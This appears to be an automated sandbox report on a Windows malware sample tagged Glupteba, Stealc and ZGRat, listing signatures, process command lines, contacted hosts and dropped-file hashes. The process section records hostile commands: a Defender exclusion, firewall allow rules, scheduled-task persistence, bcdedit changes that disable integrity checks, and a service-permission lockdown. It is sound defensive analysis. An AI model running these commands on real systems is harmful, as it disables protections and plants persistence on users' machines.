Malware Analysis Report

2024-11-30 20:09

Sample ID 240509-d4hqasbb76
Target edcd9de4254f050ffa56e723be49c0c5.bin
SHA256 166fbe093262a894127000d51aac0677a370cba01faad82120eee2f44a573d04
Tags
glupteba stealc zgrat dropper evasion execution loader rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

166fbe093262a894127000d51aac0677a370cba01faad82120eee2f44a573d04

Threat Level: Known bad

The file edcd9de4254f050ffa56e723be49c0c5.bin was found to be: Known bad.

Malicious Activity Summary

glupteba stealc zgrat dropper evasion execution loader rat stealer trojan upx

Windows security bypass

ZGRat

Stealc

UAC bypass

Glupteba payload

Glupteba

Detect ZGRat V1

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Checks computer location settings

Drops startup file

Windows security modification

Executes dropped EXE

UPX packed file

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

System policy modification

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 03:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 03:33

Reported

2024-05-09 03:36

Platform

win7-20240221-en

Max time kernel

10s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2884 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\system32\WerFault.exe
PID 2884 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\system32\WerFault.exe
PID 2884 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\system32\WerFault.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2884 -s 668

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

"C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe"

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

"C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509033401.log C:\Windows\Logs\CBS\CbsPersist_20240509033401.cab

C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe

"C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe"

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

"C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe"

C:\Users\Admin\Pictures\GaMIf1JbhjjNrLk2GeuhJpfH.exe

"C:\Users\Admin\Pictures\GaMIf1JbhjjNrLk2GeuhJpfH.exe"

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

"C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe"

C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe

"C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe"

C:\Users\Admin\AppData\Local\Temp\u234.0.exe

"C:\Users\Admin\AppData\Local\Temp\u234.0.exe"

C:\Users\Admin\AppData\Local\Temp\u234.1.exe

"C:\Users\Admin\AppData\Local\Temp\u234.1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe

"C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe

"C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
RU 193.233.132.234:80 tcp
RU 193.233.132.175:80 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.169.89:443 yip.su tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.90.14:443 realdeepai.org tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 104.21.31.124:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
DE 185.172.128.228:80 tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.244:80 download.iolo.net tcp
US 8.8.8.8:53 6e6caf46-326e-4dc6-9446-d0b9f153ded6.uuid.thestatsfiles.ru udp
US 20.150.79.68:443 tcp
DE 185.172.128.150:80 tcp
US 20.9.155.148:443 tcp
US 20.9.155.148:443 tcp
US 20.9.155.148:443 tcp

Files

memory/2884-0-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

memory/2884-1-0x0000000000310000-0x0000000000320000-memory.dmp

memory/2884-2-0x0000000002070000-0x0000000002080000-memory.dmp

memory/2884-3-0x00000000021A0000-0x00000000021FC000-memory.dmp

memory/2884-4-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

memory/2692-9-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/2520-16-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2520-19-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2520-21-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2692-23-0x00000000022E0000-0x00000000022E8000-memory.dmp

memory/2692-22-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2520-20-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2520-18-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2520-14-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2520-12-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2520-10-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA506.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarA53A.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\CabA615.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarA64A.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 623bb3a6660f1f959368177814c8725c
SHA1 adb09324480406c2bdf35e4d62e6a282ff0ad610
SHA256 48e719b215aacc45782bd9a4b47e9c1f79fe524b4cf1084487f3c9daf3ca1c53
SHA512 e48fe42f149c866b4ba9725c4d70692838b119cf8f3cb5f2fcb6cd78baa49d93da4ffea1ef88fe38552b50df9780889cff64e6a576f731950ecae1fcad341310

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 551faeb22153435d63bdcbb2e54c84a3
SHA1 9405540041e37e1308337dc452581a51b95347dc
SHA256 06151c98e02b98a528b5dccbe46f64e2f2d6c338a10ff40499bf8a7c18137446
SHA512 04dec6593546be70eede631868d79d8300fe75e64e871f6678e1f9edc38e695cba19f5f48e204962ab68f8396091065aaea34646ec3e9e04062023046d5ef5dd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cf065f2be4e05083a86c1d6089fce837
SHA1 e2902a03d2e753e6acfc916a40022fdcd6f0c79b
SHA256 4dd5539b1fd83b82f961eaab7a7d2012584621ddb295e8fdf1b0d737603de216
SHA512 21f9e853555d97e5f8a47b900f676b201e98c5f2a71bd19a7a73df1500fcfd8896a97aa6b8b16dde6ffc2e7cf360e8b76551ea494c2fd7237dc5d6d749b423e9

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

MD5 9063c4db817bf928c5fadbc839c5d600
SHA1 918f194e62fbdcb4d7d87d473882f24b49d1f764
SHA256 bd4c471050d3b1a3f1fae82f07ef5de6aedd6c85d8899869f7b846ff248ae166
SHA512 52b46eddcc532d06e748d86df3fad0ef859799602990deb4f8ae855d3119c665f6e1c3e1fd787f14fe3724e53e4bcfa9cb4ecd6e5e1dcec7cb7c7c0411faf873

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

MD5 c1dde55284cfd6ab66738e334deeacab
SHA1 f9cf805044bd7c8fc1072fc5bb4402b3f3114a5f
SHA256 be95437fc8ddb16617302fc76e2b02d48c01bbc6a3411323033335e30f4c6e6f
SHA512 7b952d41c64c4c60c36aa7f3616c280617818e4a0bdc185d7817301f0f5f6600f100af3cdee63d9b888621e4ec46d41bad8344e54a0301d86a2efa5660e87340

\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

MD5 91b3a96e3ba33e8c9c14ad1d80ae5c8b
SHA1 e47fef6b56bfe04395980a4b69882c9f97e7857e
SHA256 8fcf87e9d128fbb075a1ec4a84e59d3bda44a7c37880761c443eee513fa8ed2e
SHA512 5367affd360fd10b645381ef41724e3930b2ed9cbc1d0f4a32e883aeb3677821e57f24d7ead2fc9c714c8d32be8cbd33ba3a128939e019db715e43e01b509eaa

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

MD5 2d5fea858fec7539a4112f1cf06d9c46
SHA1 739f991e47cfcf9b2e4bcf19ab01d6c9b500bbb2
SHA256 fd851eca58163d027eacebb339a472e3bb64efa3478a6a4ead05c6d4fe5f03f4
SHA512 de8e7e35ac259a1906109702c035beca1e47e3a1d35542e24bdcc2325464d5a2e1273074105d443dcc0584bd745a1faca159d14e433304357edf62513dd91a52

memory/1696-199-0x0000000004260000-0x0000000004658000-memory.dmp

memory/1124-200-0x00000000041B0000-0x00000000045A8000-memory.dmp

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

MD5 a4a8dc8b0e657d58f55b5ea1a52650e3
SHA1 69475443fc00e3ba6a4d2c0f9aa498f2fae90cc0
SHA256 bf2dbea28bbe31217a2d7fde93ab43179a1d745e301b7e4195c0eb7c5a5a3eb3
SHA512 4f8b0be2127d9e70fca3bd051897f52f9a3567be468f2d8dc9cf93e5a90b85bf9bc15cd2706842d4b829b3230af6677b5a0f233791e05f1a767c70f2ad013416

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

MD5 ca7ed862d4ff4c5345e1454c2cabc142
SHA1 8836c1eef8897eaa9ff0e2b7ef129b0a23cfb8be
SHA256 c0d7e96f25e65dc2c1bb034cb2ddc4fccf0f207ace7fdc7e6a312d77dc1b9f0c
SHA512 aa689c713db739e1794bcbea7e75601abfecf7f4feb2ab033ed41c159cbaeb86ed40f64906c37700c6810f59b8fc8bbf8b36ab2f6a0df6362e09f5dffb18cd42

\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe

MD5 f5f50605dde6046858bbd38295e10734
SHA1 49023dd468951c62e763d81201da16c0160a8814
SHA256 5e78965522de207305a894b1aa7643cc44238b52ee2f1532e4e7f9270648b68d
SHA512 fb8fc4e8756b8f761651bf30ca1e8d06e77c7f42f78ce30aa947244246363a65fc2caba12c7c55bb91cb7db118e11cffe7459c7a1bf99116f2e9a30ea755c9cf

\Users\Admin\Pictures\GaMIf1JbhjjNrLk2GeuhJpfH.exe

MD5 830ca2606715fd6b7e3c505e48fb3981
SHA1 4ee89fbbdd4982120f5223bbbd6c5e2a14f3f178
SHA256 c5e99a29023acdc26c1acc3313f38be017cf2d254e4a95af68cd246bbd9f45a7
SHA512 2474047b586574857ad4d1d51ed70db41e3f9cb748d9efeb85f8ca486037d578cb71acb5a788f32c2f6017276d62d826be8638b2c8e26d8b6e16146a611b805a

memory/1124-237-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1684-248-0x00000000042C0000-0x00000000046B8000-memory.dmp

memory/1696-247-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1000-262-0x0000000004220000-0x0000000004618000-memory.dmp

memory/2736-263-0x00000000042F0000-0x00000000046E8000-memory.dmp

memory/2884-264-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u234.0.exe

MD5 8a9a1b742b75353c203f733b24d071ff
SHA1 1e390f6625abeaf1b8155ed4a356547047429c01
SHA256 ab5504a33a8bc3ac59151aa8c10e03600eca853df87a8080e3fdff8b0dc409f1
SHA512 df684e2538811b4c71df55493502bf6736a419ea61e45bac6f40e9efd6504e19a214382ac2ab692c082dff69923124df54e3a820529e7c2ddf5e962fdf5ea78d

memory/2540-280-0x0000000004200000-0x00000000045F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u234.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2704-296-0x0000000000400000-0x0000000002597000-memory.dmp

memory/1684-298-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1000-299-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2736-300-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1684-305-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1000-321-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2540-322-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1272-327-0x00000000040A0000-0x0000000004498000-memory.dmp

memory/1948-329-0x0000000004220000-0x0000000004618000-memory.dmp

memory/844-333-0x00000000040F0000-0x00000000044E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 b1383960cb38a7f121442d284863607e
SHA1 195638af26b0dd2a343c64dbf78469791db7e865
SHA256 9d82d7620bac3753d19ab54449d559e49d2c8f01fb5fdf899db0bc649429b385
SHA512 932dca0aa2d5ae30a5896d4c013256aab982baeeed4dc6c608157ecd621dca0a299ce8e192e8ea679695b94b9990eba7ad4bf2c8c3bf67cc88a3d1484cc5e48a

memory/2884-342-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

memory/2512-341-0x0000000000400000-0x0000000002574000-memory.dmp

